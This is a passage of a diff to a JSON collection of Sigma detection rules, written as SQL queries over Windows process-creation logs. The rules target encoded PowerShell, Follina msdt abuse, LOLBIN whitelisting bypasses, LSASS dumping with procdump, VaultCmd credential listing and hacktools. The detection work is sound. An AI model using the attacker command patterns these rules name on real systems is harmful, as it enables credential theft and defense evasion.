'%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "status": "experimental", - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Legitimate use by an administrator" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Local Accounts Discovery", - "id": "502b42de-4306-40b4-9596-6f590c81f073", - "status": "test", - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate administrator or user enumerates local users for legitimate reason" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ + "attack.execution", + "attack.t1059.005", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", - "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + "author": "Markus Neis, Sander Wiebing", "tags": [ "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "status": "test", - "description": "Detects suspicious IIS native-code module installations via command line", + "description": "Detects a ping command that uses a hex encoded IP address", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1218", + "attack.t1216" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Execute Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, oscd.community", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1218" - ], - "falsepositives": [ - "System administrator Usage" + "attack.lateral_movement", + "attack.t1021.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", - "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "status": "test", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "status": "test", - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "title": "Mstsc.EXE Execution With Local RDP File", + "id": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", + "status": "experimental", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", + "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likely with legitimate usage of \".rdp\" files" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": "experimental", - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Unmount Share Via Net.EXE", + "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1070.005" ], "falsepositives": [ - "Unknown" + "Administrators or Power users may remove their shares via cmd line" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_net_share_unmount.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "status": "experimental", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.discovery" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. 